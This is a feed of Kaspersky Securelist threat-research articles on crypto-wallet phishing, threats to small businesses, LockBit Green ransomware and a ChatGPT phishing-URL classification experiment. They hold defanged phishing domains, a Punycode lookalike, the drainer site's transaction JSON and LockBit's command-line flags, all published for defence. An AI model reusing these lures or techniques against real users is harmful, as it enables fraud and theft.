Spam and Phishing – Securelist https://securelist.com Mon, 03 Jul 2023 11:49:25 +0000 en-US hourly 1 https://wordpress.org/?v=6.2.2 https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png Spam and Phishing – Securelist https://securelist.com 32 32 Email crypto phishing scams: stealing from hot and cold crypto wallets https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/ https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/#respond Wed, 05 Jul 2023 10:00:09 +0000 https://kasperskycontenthub.com/securelist/?p=110136

The higher the global popularity of cryptocurrencies and the more new ways of storing them, the wider the arsenal of tools used by malicious actors who are after digital money. Scammers tailor the complexity of technology they use and the thoroughness of their efforts to imitate legitimate websites to how well the target is protected and how large the amount is that they can steal if successful. This story covers two fundamentally different methods of email attacks on the two most popular ways of storing cryptocurrency: hot and cold wallets.

Hot wallets and attempts at hacking them

A hot wallet is a cryptocurrency wallet with permanent access to the internet. This is essentially any online service that provides cryptocurrency storage, ranging from crypto exchanges to specialized apps.

Hot wallets are a highly popular crypto storage option. This can be explained by the simplicity of creating one (registering with a wallet service is all you need to do) and the ease of withdrawing and converting funds. The popularity and simplicity of hot wallets makes them cybercriminals’ main target. However, for this reason, and due to the fact that hot wallets are always online, they are rarely used for storing large amounts. Hence, cybercriminals have little motivation to invest heavily into phishing campaigns, and so, techniques used in email attacks on hot wallets are hardly ever original or complex. In fact, they look rather primitive and target mostly unsophisticated users.

A typical phishing scam aimed at a hot wallet user works as follows: hackers send email messages addressed as coming from a well-known crypto exchange and requesting the user to confirm a transaction or verify their wallet again.

Sample phishing email that targets Coinbase users

Sample phishing email that targets Coinbase users

After the user clicks the link, they are redirected to a page where they are asked to enter their seed phrase. A seed phrase (recovery phrase) is a sequence of 12 (less commonly 24) words for recovering access to a crypto wallet. This is essentially the main password for the wallet. The seed phrase can be used for gaining or recovering access to the user’s account and making any transactions. The seed phrase cannot be changed or recovered: by misplacing it, the user risks losing access to their wallet for good, and by giving it to scammers, permanently compromising their account.

Seed phrase entry page

Seed phrase entry page

If the user enters the seed phrase on a fake web page, scammers get full access to the wallet and the ability to siphon all of the funds to their own addresses.

Fairly simple and devoid of software or social engineering tricks, scams like these typically target non-technical users. A seed phrase entry form usually has a stripped-down look: just an input field and a crypto exchange logo.

Phishing scams that target cold wallets

A cold wallet (cold storage) is a wallet without a permanent connection to the internet, like a dedicated device or even just a private key written on a slip of paper. Hardware storage is the most common type of cold wallets. As these devices are offline most of the time, and remote access is impossible, users tend to store significantly larger amounts on these. That said, it would be erroneous to believe that a hardware wallet cannot be compromised without stealing it, or at least, getting physical access to it. As is the case with hot wallets, scammers use social engineering techniques to get to users’ funds. We spotted an email campaign recently that was specifically aimed at the owners of hardware cold wallets.

This type of attack starts as a crypto email campaign: the user gets an email, addressed as being from the Ripple cryptocurrency exchange and offering to join a giveaway of XRP tokens, the platform’s internal cryptocurrency.

Phishing email pretending to be from Ripple cryptocurrency exchange

Phishing letter pretending to be from the Ripple cryptocurrency exchange

If the user clicks the link, they are presented with a blog page featuring a post that explains the rules of the “giveaway”. The post contains a direct link to “registration”.

Fake Ripple blog

Fake Ripple blog

Already at this point, the scam shows a few differences from mass attacks on hot wallets: instead of sending the user a link to a phishing page, the scammers used a more sophisticated immersion trick with a blog post. They also went so far as meticulously copying the design of the Ripple website and registering a domain name that was nearly identical to the exchange’s official domain. This is called a Punycode phishing attack. At first glance, the second-level domain is identical to the original one, but a closer look will reveal that the letter “r” has been replaced with a Unicode character that uses a cedilla:

https://app[.]xn--ipple-4bb[.]net -> https://app[.]ŗipple[.]net/

Also, the scam site is hosted in the .net top-level domain, rather than .com, where the official Ripple website is located. This may not raise any red flags with the victim, though, as both domains are widely used by legitimate organizations.

After the user follows the link from the “blog” to the fake Ripple page, they are offered to connect to the WebSocket address wss://s2.ripple.com.

Connection to the WebSocket address

Connection to the WebSocket address

Next, the user is offered to enter the address of their XRP account.

Entering XRP account address

The website then offers to choose an authentication method for receiving the bonus tokens.

Choosing an authentication method

Choosing an authentication method

As you can see, hardware wallets are top of the list and suggested by scammers. Selecting Trezor redirects the user to the official website trezor.io, which allows to connect devices to web apps via Trezor Connect API. The API is used for simplifying transactions with the help of a hardware wallet. The scammers want the victim to connect to their website, so they can withdraw the funds from the victim’s account.

When the user attempts to connect to the third-party website, Trezor Connect asks them to consent to anonymous collection of data and to confirm that they want to connect to the website. The address of the scam site is displayed in a Punycode view as: https://app[.]xn--ipple-4bb[.]net. The scammer’s hope is that the user misses the address, which is provided in small print on the side of the page.

Trezor Connect: confirming the connection to the scam site

Trezor Connect: confirming the connection to the scam site

Connection via Ledger is a lot like Trezor, but it uses the WebHID interface, with the other steps unchanged.

What happens after the user connects their hardware wallet? We had to explore the code of the phishing site just a bit to answer that question. The website is powered by an application written in Node.js. This uses two APIs:

  • wss://s2.ripple.com, the official WebSocket address for Ripple transactions
  • The phishing site API, for example: app[.]xn--ipple-4bb[.]net/api/v1/action

The scammers use these two APIs for interacting with the victim’s XRP account. The phishing site API talks to the WebSocket address, verifies account details and requests funds. For this purpose, the scammers spin up one-off intermediate wallets.

Withdrawal request Response and description
{
 "command": "get_payment"
 "account": victim_address,
 "transactionType": "Payment"
}
{
	"success": true,
	"data": {
    	"TransactionType": "Payment",
    	"Account": victim_address,
    	"Fee": "10",
    	"Sequence": 391,
    	"Destination": "rU53pnJzEv2mrtck…"*,
    	"Flags": 2147483648,
    	"Amount": "xxx",
    	"LastLedgerSequence": 79548458
	}
}
* The scammers generate a new address every time

The intermediate account is used for just two things: to receive the victim’s funds and to forward these to the scammers’ permanent account. This helps to hide the final destination.

Statistics

In the spring of 2023, Kaspersky antispam solutions detected and blocked 85,362 scam emails targeting cryptocurrency users. Scam email campaigns peaked in March, with 34,644 messages. We blocked 19,902 emails in April and 30,816 in May.

Number of detected phishing emails targeting cryptocurrency users in March–May 2023 (download)

Conclusion

Scammers understand one thing just fine: the harder it is to get to the loot, the bigger it is likely to be. Therefore, attacks on hardware wallets, which many consider bullet-proof, use far more sophisticated tactics than those employed against the users of online crypto storage services. Although hardware wallets are indeed more secure than hot wallets, users should not lower their guard. Check every detail carefully before giving any website access to your wallet, and refuse to connect if anything smells fishy.

]]>
https://securelist.com/hot-and-cold-cryptowallet-phishing/110136/feed/ 0 full large medium thumbnail
How cybercrime is impacting SMBs in 2023 https://securelist.com/smb-threat-report-2023/110097/ https://securelist.com/smb-threat-report-2023/110097/#comments Tue, 27 Jun 2023 06:00:36 +0000 https://kasperskycontenthub.com/securelist/?p=110097

According to the United Nations, small and medium-sized businesses (SMBs) constitute 90 percent of all companies and contribute 60 to 70 percent of all jobs in the world. They generate 50 percent of global gross domestic product and form the backbone of most countries’ economies. Hit hardest by the COVID pandemic, geo-political and climate change, they play a critical role in a country’s recovery, requiring greater support from governments to stay afloat.

In the past, the perception was that large corporations were more attractive to cybercriminals. Yet in reality, cybercriminals can target anyone, especially those who are less protected, while small businesses typically have smaller budgets and are not as securely protected as larger companies.

According to a report by the Barracuda cybersecurity company, in 2021, businesses with fewer than 100 employees experienced far more social engineering attacks than larger ones. That same year saw one of the worst ransomware incidents in history, the Kaseya VSA supply-chain attack. By exploiting a vulnerability in the software, the cybergang REvil infiltrated between 1,500 and 2,000 businesses around the world, many of which were SMBs. For example, the attack hit a small managed service provider Progressive Computing, and, by virtue of the domino effect, the company’s 80 clients, which were mainly small businesses. Although the attack was stopped fairly quickly, the SME sector was understandably shaken, alerting businesses to the fact that everyone was vulnerable.

According to the Kaspersky cyber-resilience report, in 2022, four in ten employers admitted that a cybersecurity incident would be a major crisis for their business, superseded only by a slump in sales or a natural disaster. A cybersecurity crisis would also be the second most difficult type of crisis to deal with after a dramatic drop in sales if judged by the results of the survey.

In this report, we have analyzed the key threats to small and medium-sized companies in 2022 and 2023, and provided advice on how to stay safe.

Methodology

The statistics used in this report were collected from January through May 2023 by Kaspersky Security Network (KSN), a system for processing anonymized cyberthreat-related data shared voluntarily by Kaspersky users.

To assess the threat landscape for the SMB sector, Kaspersky experts collected the names of the most popular software products used by its clients who owned small or medium-sized businesses around the world. The final list of the software includes MS Office, MS Teams, Skype and others used by the SMB sector. We then ran these software names against Kaspersky Security Network (KSN)* telemetry to find out how much malware and unwanted software was distributed under the guise of these applications.

Malware attacks

Between January 1 and May 18, 2023, 2,392 SMB employees encountered malware or unwanted software disguised as business applications, with 2,478 unique files distributed this way. The total number of detections of these files was 764,015.

Below is a brief description of the most popular types of threats that SMB employees encountered in January–May 2023:

Exploits

The biggest threat to SMBs in the first five months of 2023 were exploits, which accounted for 483,980 detections. Malicious and/or unwanted software often infiltrates the victim’s computer through exploits, malicious programs designed to take advantage of vulnerabilities in software. They can run other malware on the system, elevate the attackers’ privileges, cause the target application to crash and so on. They are often able to penetrate the victim’s computer without any action by the user.

Trojans

The second-biggest threat were Trojans. Named after the mythical horse that helped the Greeks infiltrate and defeat Troy, this type of threat is the best-known of them all. It enters the system in disguise and then starts its malicious activity. Depending on its purpose, a Trojan can perform various actions, such as deleting, blocking, modifying or copying data, disrupting the performance of a computer or computer network, and so on.

Backdoors

The third most common threat are backdoors. These are among the most dangerous types of malware as, once they penetrate the victim’s device, they give the cybercriminals remote control. They can install, launch and run programs without the consent or knowledge of the user. Once installed, backdoors can be instructed to send, receive, execute and delete files, harvest confidential data from the computer, log activity, and more.

Not-a-virus

Potentially unwanted applications (PUAs) that can be inadvertently installed on your device are labeled “not-a-virus” by our solutions. Although they are listed among the most widespread threats and can be used by cybercriminals to cause harm, they are not malicious per se. Nonetheless, their behavior is annoying, sometimes even dangerous, and the antivirus alerts users because, despite being legal, they often sneak onto the device without the user realizing.

TOP 10 threats for SMBs, January-May 2022 (download)

TOP 10 threats for SMBs, January-May 2023 (download)

Cybercriminals attempt to deliver this and other malware and unwanted software to employees’ devices by using any means necessary, such as vulnerability exploitation, phishing e-mails and fake text messages. Even something totally unrelated to business, such as a YouTube link, may be used to target SMBs, as their employees often use the same devices for work and personal matters.

One of the methods often utilized to hack into employees’ smartphones is so-called “smishing” (a combination of SMS and phishing). The victim receives a link via SMS, WhatsApp, Facebook Messenger, WeChat or some other messaging app. If the user clicks the link, malicious code is uploaded into the system.

Examples of scam threats and phishing

Phishing and scam can pose a significant threat to SMBs, as scammers try to mimic payment, loan and other services, as well as cloud service providers like Microsoft, in order to obtain confidential information or company funds. Often, the phishing pages where the employees land if they click a link in a scam e-mail are tailored to look like login pages to the target systems with the corresponding logo on the page. Below, we provide several examples of phishing pages that imitate various services in an attempt to get hold of the target company’s data and money.

  • An insurance company

    Scammers trying to hack the work account of an insurance company employee

    On the screenshot above scammers are trying to hack the insurance company account of its client’s employee.

  • A “personal” banking service

    These scammers disguise themselves as a financial institution. On the phishing page that claims to offer personal banking services, they ask users to log in with their corporate banking account credentials. If an employee enters their credentials, the scammers get access to their account.

  • A fake website pretending to be a legitimate delivery service

    Here, the cybercriminals imitate the website of a well-known delivery provider in order to fool businesses into giving away their corporate DHL accounts.

Scammers often reach employees by e-mail. Attackers use social engineering techniques to try to trick employees into following a phishing link, revealing the company’s confidential data or transferring money.

For example, in late 2022, scammers posing as top-level executives of a company sent out e-mails to their employees, instructing them to move money from a business account into another account urgently. Fake e-mails were thoroughly crafted, so that the employees would not question their authenticity.

Some spammers pretend to be representatives of financial organizations offering attractive deals to startup businesses. However, by applying for funding thus offered, an employee may give out sensitive data or even lose company money.

SMB employees and especially managers are often the target of spam campaigns touting collaborations and B2B services, such as SEO, advertising, recruitment assistance and lending. Small and little-known firms with questionable service quality typically promote themselves that way. Often they send their offer repeatedly, even if they never receive an answer.

Qbot Trojan using a conversation hijacking technique

Recently, Kaspersky researchers discovered a new campaign employing the “conversation hijacking” technique. The attackers gained access to the victim’s e-mail and replied to their conversations. Posing as one of the respondents in the e-mail chain, the fraudsters sent a message with a PDF attachment asking the victim to download it. The PDF contained a fake notification from Microsoft Office 365 or Microsoft Azure which unleashed the Qbot Trojan when downloaded. The attackers also sent messages containing a URL that was supposed to lead to an “important business document”.

Qbot (aka QakBot, QuackBot, and Pinkslipbot) has been around since 2007. This malware is classified as a banking Trojan as it enables hackers to mine their victims’ banking credentials. The malware can also collect cookies from victims’ browsers, access their correspondence, spy on their banking activities and record keystrokes. Finally, the Trojan can install other malware, such as ransomware.

Conclusion

As cybercriminals target SMBs with all types of threats — from malware disguised as business software to elaborate phishing and e-mail scams — businesses need to stay on high alert. This is critical, because a single cyberattack can lead to catastrophic financial and reputational losses for a company. To keep your business protected from cyberthreats, we recommend you do as follows:

  • Provide your staff with basic cybersecurity hygiene training. Conduct a simulated phishing attack to ensure that they know how to recognize phishing e-mails.
  • Use a security solution for endpoints, such as Kaspersky Endpoint Security for Business or Cloud-Based Endpoint Security, to minimize the chances of infection.
  • If you are a Microsoft 365 user, remember to protect that too. Kaspersky Security for Microsoft Office 365 includes dedicated apps that target spam and phishing, and protect SharePoint, Teams and OneDrive for secure business communications.
  • Set up a policy to control access to corporate assets, such as e-mail boxes, shared folders and online documents. Keep it up to date and remove access if the employee has left the company or no longer needs the data. Use cloud access security broker software that can help manage and monitor employees’ cloud activity and enforce security policies.
  • Make regular backups of essential data to ensure that corporate information stays safe in an emergency.
  • Provide clear guidelines on the use of external services and resources. Employees should know which tools they should or should not use and why. Any new work software should go through a clearly outlined approval process by IT and other responsible roles.
  • Encourage employees to create strong passwords for all digital services they use and to protect accounts with multi-factor authentication wherever applicable.
  • Use professional services to help you get the most out of your cybersecurity resources. The new Kaspersky Professional Services Packages for SMB provides access to Kaspersky’s expertise on assessment, deployment and configuration: all you need to do is add the package to the contract, and our experts will do the rest.
]]>
https://securelist.com/smb-threat-report-2023/110097/feed/ 1 full large medium thumbnail
LockBit Green and phishing that targets organizations https://securelist.com/crimeware-report-lockbit-switchsymb/110068/ https://securelist.com/crimeware-report-lockbit-switchsymb/110068/#respond Thu, 22 Jun 2023 10:00:01 +0000 https://kasperskycontenthub.com/securelist/?p=110068

Introduction

In recent months, we published private reports on a broad range of subjects. We wrote about malware targeting Brazil, about CEO fraud attempts, Andariel, LockBit and others. For this post, we selected three private reports, namely those related to LockBit and phishing campaigns targeting businesses, and prepared excerpts from these. If you have questions or need more information about our crimeware reporting service, contact crimewareintel@kaspersky.com.

Phishing and a kit

Recently we stumbled upon a Business Email Compromise (BEC) case, active since at least Q3 2022. The attackers target German-speaking companies in the DACH region. As in many other BEC cases, they register a domain name that is similar to that used by the attacked organization and typically differs in one or two letters. For reasons unknown, the Reply-to field contains a different email address from the From field. The Reply-to email address does not mimic the target-organization’s domain.

In contrast to BEC campaigns that are targeted and require significant effort from the criminals, ordinary phishing campaigns are relatively simple. This creates opportunities for automation, of which the SwitchSymb phishing kit is one example.

At the end of this past January, we observed a spike in phishing email from a campaign targeting business users, which we have closely monitored. We noticed that the message contained a link to an “email confirmation form”. If one clicked on the link, they found themselves on a page looking very similar to that of the recipient’s domain. The phishing kit was designed to serve multiple campaigns at a time while running one instance on the web server. This was easily demonstrated by modifying the page URL, specifically the reference to the targeted user in it^ the layout of the phishing page would change.

An example of a SwitchSymb-generated phishing page

An example of a SwitchSymb-generated phishing page

LockBit Green

LockBit is one of the most prolific ransomware groups currently active, targeting businesses all over the world. Over time, they have adopted code from other ransomware gangs, such as BlackMatter and DarkSide, making it easier for potential affiliates to operate the ransomware.

Starting in this past February, we have detected a new variant, named “LockBit Green”, which borrows code from the now-defunct Conti gang. According to the Kaspersky Threat Attribution Engine (KTAE), LockBit incorporates 25% of Conti code.

KTAE shows similarities between LockBit Green and Conti

KTAE shows similarities between LockBit Green and Conti

Three pieces of adopted code really stand out: the ransomware note, the command line options and the encryption scheme. Adopting the ransom note makes the least sense. We could not think of a good reason for doing so, but nevertheless, LockBit did it. In terms of command line options, the group added those from Conti to make them available in Lockbit. All the command line options available in Lockbit Green are:

Flag Functionality
-p folder Encrypt the selected folder using a single thread
-m local Encrypt all available drives within multiple threads, each of them
-m net Encrypt all network shares within multiple threads, each of them
-m all Encrypt all available drives and Network shares within multiple threads, each of them
-m backups Flag not available to use on the detected versions but coded inside the ransomware
-size chunk Functionality to encrypt only part of the files
-log file.log Possibility to log every action performed by the ransomware
-nomutex Skip mutex creation

Finally, LockBit adopted the encryption scheme from Conti. The group now usesa custom ChaCha8 implementation to encrypt files with a randomly generated key and nonce that are saved/encrypted with a hard-coded public RSA key.

Binary diffing across the two families

Binary diffing across the two families

Multi-platform LockBit

We recently stumbled on a ZIP file, uploaded to a multiscanner, that contained LockBit samples for multiple architectures, such as Apple M1, ARM v6, ARM v7, FreeBSD and many others. The next question would obviously be, “What about codebase similarity?”.

For this, we used the KTAE: simply throwing in the downloaded ZIP file was enough to see that all the samples were derived from the LockBit Linux/ESXi version, which we wrote about in an earlier private report.

Source code shared with LockBit Linux

Source code shared with LockBit Linux

Further analysis of the samples led us to believe that LockBit were in the process of testing their ransomware on various architectures, instead of deploying it in the wild. For instance, the macOS sample was unsigned, so it could not be executed as is. Also, the string encryption method was simple: one byte XOR.

Nevertheless, our findings suggest that LockBit will target more platforms in the wild in the (near) future.

Conclusion

The world of cybercrime is huge, consisting of many players and gangs that are fluid in terms of composition. Groups adopt other groups’ code, and affiliates — which can be considered cybercrime groups in their own right — switch between different types of malware. Groups work on upgrades to their malware, adding features and providing support for multiple, previously unsupported, platforms, a trend that existed for some time now.

When an incident occurs, it is important to find out who has targeted you. This helps to limit the scope of incident response and could help to prevent further damage. The KTAE attributes code to cybercrime groups and highlights features shared by different malware families. This information can also help in taking proactive countermeasures to prevent incidents from happening in the future.

Finally, criminals often resort to old tricks, such as phishing, which, nevertheless, remain highly effective. Being aware of the latest trends can prevent threats like BEC from materializing.

Intelligence reports can help you to stay protected against these threats. If you want to keep up to date on the latest TTPs used by criminals or have questions about our private reports, contact crimewareintel@kaspersky.com.

]]>
https://securelist.com/crimeware-report-lockbit-switchsymb/110068/feed/ 0 full large medium thumbnail
What does ChatGPT know about phishing? https://securelist.com/chatgpt-anti-phishing/109590/ https://securelist.com/chatgpt-anti-phishing/109590/#comments Mon, 01 May 2023 10:00:20 +0000 https://kasperskycontenthub.com/securelist/?p=109590

Hearing all the buzz about the amazing applications of ChatGPT and other language models, our team could not help but ask this question. We work on applying machine learning technologies to cybersecurity tasks, specifically models that analyze websites to detect threats such as phishing. What if all our complex, multi-layered detection systems are now obsolete, and a single LLM (large language model) to rule them all can fight cybercriminals better than we do?

To answer this question, we conducted an experiment to see how good ChatGPT is at recognizing overtly malicious links. In this article, we provide a practical example of how an LLM can be applied to a real, albeit simplified, cybersecurity task, and describe all the interesting things we learned along the way. Since we didn’t have any illusions that ChatGPT could actually be used as a detection method, our primary goal was to find out how much cybersecurity knowledge ChatGPT has learned from its training data and how it could possibly assist a human analyst in their job.

Why URL classification?

An analyst’s trained eye can spot an obviously malicious link in a split second (and you probably can too):

hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

  • This is not the Office365 login link, is it?

(links in the article are partially masked with x)

A rule of thumb for finding tasks to which ML can be applied is that if a person can do it instantly, almost without thinking, it’s probably a good candidate. Still, building a machine-learning system requires a lot of effort, from gathering data and crafting features to preparing the infrastructure. The promise of replacing all that with a single interface configured via natural language sounds too good to be true, but just how far is it from being a reality?

When conducting this experiment, we were well aware of the limitations of large language models, as well as the fact that OpenAI asks that this emerging technology not be applied to any high-risk area, and state the following regarding GPT-4’s cybersecurity applications in the system card:

However, GPT-4 has significant limitations for cybersecurity operations due to its “hallucination” tendency and limited context window.

It is natural to assume that GPT-3.5-turbo will exhibit these limitations to a greater extent.

We chose the URL classification task because:

  • Unlike a whole HTML page, a URL fits easily into an LLM, because modern LLMs, such as ChatGPT, can only consume a limited number of symbols (more precisely, tokens) at a time (they have a fixed context window, in LLM-speak).
  • Obviously malicious links are easy to detect, but the task is still non-trivial, because it requires world knowledge (for example, knowing the names of popular web services).
  • URLs are still text, and LLMs are good at processing text.

So here is what we did.

Let’s talk?

First of all, we opened the ChatGPT web interface and checked if what we wanted was even possible:

Judging by the URL, is this link a phishing attempt? Please explain why. Link: hxxp://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Yes, it is likely a phishing attempt.

The URL appears to be intentionally deceptive, as it contains several red flags:

  • The domain name “caseld-10xxxx.info” is not associated with any reputable or recognizable entity, and it looks like a random sequence of letters and numbers.
  • The URL uses the term “Office365” which is a popular productivity suite, and it is a common target for phishing attacks. Cybercriminals often use this tactic to lure unsuspecting victims into clicking on a link and disclosing sensitive information.
  • The word “live” in the URL could be used to imply that the page is an official Microsoft Office365 login page, as Microsoft has used “live” in the past in some of its services.
  • The misspelling of “Office” as “0fflce” is another red flag as it is a common tactic used by phishers to trick users into believing the website is legitimate.
  • The “.php” extension at the end of the URL suggests that it is a PHP script running on a server, which is commonly used in phishing attacks to harvest login credentials.

Therefore, it is advisable to avoid clicking on such links and to always check the URL’s legitimacy before entering any personal information or credentials.

This is a pretty reasonable explanation. Aside from the fact that the model shows some distrust of PHP (well, who doesn’t?), it is good at recognizing the target organization, a homographic attack (0ffice), and even points out why “live” might have been used. This is an explanation worthy of a junior analyst.

To gather a corpus of explanations, we used OpenAI API to query the model called GPT-3.5-turbo, which is the backend for ChatGPT. It is fast and cheap (we check a lot of links), but still powerful enough. For the test corpus, we gathered a few thousand links that our detection technologies deemed phishing, and threw in a few thousand safe URLs.

Attempt 1. Is it phishing?

ChatGPT is great at providing the answer in the form that you require – from poems:

And lastly, “0fflce” it doth spell amiss,

A trick oft used by phishers with a hiss.

Beware, dear user, and take great care,

Lest thou fall victim to this cyber snare.

to machine-readable formats. It can also do more than one thing at once. This means that in addition to the yes/no answer to the question about link safety, we could ask ChatGPT to format the response as JSON and also to include a rationale, as well as the possible target. So, after a few iterations, we settled on the following prompt:

{"role": "system", "content": "You are CyberGPT, a guru cyber security assistant AI."},
        {
            "role": "user", 
            "content": 'Does this link lead to a phish website? Answer in the json format {"phish": "yes|no", "reasoning": "detailed explanation why", "target_company": "possible targeted company"}\nLink: ' + url
        }

We use a system prompt here (according to practitioners and docs, this is less important than the user input) that portrays ChatGPT as a cybersecurity chatbot and ask for its verdict in the user prompt. Frankly, the fact that it is so easy to get the desired output from ChatGPT is awe-inspiring.

It took us two nights to get about 6,000 verdicts (probably because we ran the experiment at the peak of all the hype), and once we got the data, we proceeded to parse the results.

Unfortunately, while most of the outputs could be parsed as is, some were corrupted: some contained additional text, such as “Note: be careful when opening links…” or just a dot at the end, others had unnecessary escape characters. All in all, less than 0.5% of JSONs were broken beyond automated fixes or contained text such as:

I am sorry, but as an AI language model, I am not able to access the internet or browse the website provided. However, as per the standard industry practices, you can check the legitimacy of the website by running it through a reputable online phishing detection service/provider. Additionally, if there are any official reports of phishing attacks or scams associated with the target company, it further increases the likelihood of the link leading to a phish website.

Which is still a reasonable answer.

All in all, after all the errors and rejections, we were left with a dataset of 2322 phish and 2943 safe URLs. The resulting metrics are:

  • Detection rate: 87.2%
  • False positive rate: 23.2%

While the detection rate is very high, the false positive rate is unacceptable. Imagine if every fifth website you visit was blocked? Sure, no machine learning technology on its own can have a zero false positive rate, but this number is too high. To put this in perspective, in a well-known paper called URLnet, where Le et al. solved a very similar task, the authors managed to achieve about the same level of detection rate (~85%) with a false positive rate of about 0.4% with a specially crafted convolutional neural network. A more recent URLTran paper by Maneriker et al. uses Transformers (the same architecture that powers ChatGPT) to achieve an even lower FPR.

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

ROC curve from Le et al., 2018, illustrating achievable TPR (DR)/FPR values

Unfortunately, there are no miracles here. This is also where we met the first limitation – we can’t adjust the threshold to trade FPR for DR. Or can we?

The second experiment: ‘Is it safe?’

Our prompt was probably too specific and cued the language model to view the link with suspicion. Instead of asking if the link is phishing, we could ask if it is safe to visit, and maybe the LLM would behave less suspiciously. This led us to the second prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no", "yes_confidence": 0.5}'
            '\nwhere "yes_confidence" is the confidence that the link is safe from 0 to 1. '
            'Only output json.'
            '\nLink: ' + url
        },

Differences from the previous prompt:

  • Gone is the ‘cybersecurity guru’, who by nature should be suspicious of random links
  • We don’t ask for the target, so as not to alert the model that this is a phishing detection task
  • We do, however, ask for confidence. Though this is very unlikely, confidence may prove useful.

The results were quite discouraging:

  • Detection rate: 93.8%
  • False positive rate: 64.3%

It turns out that the more general prompt is more likely to prompt a verdict that the link is dangerous. This is how the links from the safe subset of data changed the assigned verdicts, compared to the previous cybersecurity guru prompt:

Internet security assistant chatbot verdicts (safe data) safe unsafe
CyberGPT cybersecurity guru verdicts (safe data)
safe 1049 1210
phish 2 682

Interestingly, the confidence choices are more like human-assigned confidence in the sense that round numbers like 90% occur most often:

TOP 5 probabilities that the model chose. Note that they are rounded to 0.1 (download)

At least the ROC curve looks alright, but there is no point at which this prompt would outperform the cybersecurity guru from the previous attempt:

ROC curve based on probabilities provided by ChatGPT

ROC curve based on probabilities provided by ChatGPT

To conclude, it is hard to predict the behavior of the LLM based on human reasoning about the prompt. Probably the “safety” of a link is a vaguer concept than “phish”. Understanding why the first prompt won by a large margin is difficult, and choosing the best prompt at this time, despite the emergence of new prompt engineering techniques, is more art than science.

Verdict stability

An important fact about LLMs is that the generation process is random. While you can coerce an LLM to be almost deterministic by setting its temperature parameter, which actually controls the output randomness, to 0 (there are still numerical sources of non-determinism), it usually leads to poor performance (such as the tendency to repeat the same phrase over and over again). As a result, for each token (a word or its part) that the network generates, it has a few alternatives among the choices (also controllable by parameters).

Non-deterministic verdicts are not the top feature you expect from a detection system. To measure its impact on the results, we conducted another small experiment in which we chose 200 random URLs (100 safe and 100 phish) and gathered verdicts with the same simplified prompt:

{"role": "system", "content": "You are a helpful internet security assistant chatbot."},
        {
            "role": "user", 
            "content": 'Is this link safe to visit? '
            'Answer in the json format: {"safe": "yes|no"}'
            '\nOnly output json.'
            '\nLink: ' + url
        },

This is how the results of these two identical runs compare (the responses are not post-processed and answer the question of whether the link is safe):

Run 2 no unknown yes
Run 1
no 145 2 3
yes 4 0 46

So, the verdict for 4.5% percent of the URLs changed due to the randomness of the LLM, with the variation in verdicts between runs on safe URLs being 7%. Again, while this can be remedied by tweaking the temperature, it’s an important factor to keep in mind when using LLMs.

Organization extraction

The most striking aspect of ChatGPT’s performance was the extraction of the potential phishing target. When attackers craft their samples, they try to trick users into believing that the URL is genuine and belongs to a company, while also obfuscating it enough to fool automated analysis. Extracting the attack target can be useful in many scenarios.

ChatGPT has enough real-world knowledge to know about many internet and financial services and with only a small post-processing step (e.g., merging “Apple” and “iCloud” or removing “LLC” and “Inc”) it does a very good job at extracting them. It was able to identify a target more than half the time. Note that not every URL contains a reference to a target organization. Among the identified companies, there were major tech portals like Facebook, TikTok and Google, marketplaces such as Amazon and Steam, lots of banks from all over the world, from Australia to Russia, cryptocurrency and delivery services.

Some interesting examples include:

URL: hxxps://steancxxxmuunity.com/profiles/765xxxxxxxxxx175

Organization: Steam

Reasoning: The domain name ‘steancxxxmuunity.com’ appears to be a typo-squatting attempt. The correct spelling of the domain should be ‘steamcommunity.com’. The website is trying to impersonate Steam Community, a popular gaming platform…

URL: https://cxxxxxxxxr.com/wp-includes/js/jcrop/cgi/BOfA/Validation/login.php?cmd=login_submit

Organization: Bank of America

Reasoning: The link is suspicious and indicates a phishing attempt because the domain name is not related to the possible targeted company (Bank of America), the URL is also suspicious containing additional characters such as ‘/wp-includes/js/jcrop/cgi’…

URL: http://caseld-10xxxx.info/1/Office365/0fflce3.6.5/live/login.php

Organization: Microsoft

Reasoning: The link’s domain name (caseld-10xx93.info) does not appear to be related to Microsoft’s Office 365 service. The URL path also contains a misspelled version of the word ‘office’ (0fflce) and a suspiciously old version number (3.6.5).

URL: http://adobexxxsignxxxx.duckdns.org/ees/

Organization: Adobe

Reasoning: The domain name ‘duckdns.org’ is a free dynamic DNS provider which is often used by cyber criminals for hosting phishing sites or other malicious content. Additionally, the subdomain adobexxxsignxxxx in the URL appears to imitate the legitimate Adobe service ‘Adobe Sign’, which suggests that the attackers may be targeting Adobe’s customers for information theft or fraud.

Here we see that ChatGPT detects homographic attacks (although it can confuse them with typo-squatting), and correctly states that the domains are not related to the companies. While it fails to untangle that “3.6.5” is an imitation of 365, the explanations are quite reasonable.

Implicit knowledge: reasoning analysis

The examples above are cherry-picked. When cherry-picking with the opposite intention, some funny things happen. The explanations that ChatGPT provides may include:

  • References to WHOIS, which the model doesn’t have access to:
    • Finally, if we perform a WHOIS lookup for the domain name, it was registered very recently (2020-10-14) and the registrant details are hidden.
  • References to content on a website that the model doesn’t have access to either:
    • the website is asking for user credentials on a non-Microsoft website. This is a common tactic for phishing attacks.
    • Additionally, the webpage’s layout and design are inconsistent with eBay’s official website, indicating that it may be a fake website designed to impersonate eBay.
    • There is also no information available on the website’s security and privacy policy. A secure website should provide that information transparently to users.
  • References to SSL certificate expiration:
    • The domain ‘duckdns.org’ is not owned by Netflix, and the SSL Certificate is invalid.
  • Misstatements:
    • The domain ‘sxxxxxxp.com’ is not associated with Netflix and the website uses ‘http’ protocol instead of ‘https’ (the website uses https)
  • Revelatory nuggets of cybersecurity information:
    • The domain name for the URL ‘yxxxx3.com’ appears to be registered in Korea which is a red-flag.

These are funny and highlight the limitations of an LLM: while it can generate reasonable explanations, it is also prone to hallucinations – such as imagining contexts that it does not have access to, or coming up with facts that are just plain wrong.

In general, however, we see that the model demonstrates a non-trivial understanding of the task. Analyzing all the explanations by hand would be laborious, so we do some distant reading here to get a bird’s-eye overview of the reasonings it generates by applying a little bit of old-school NLP.

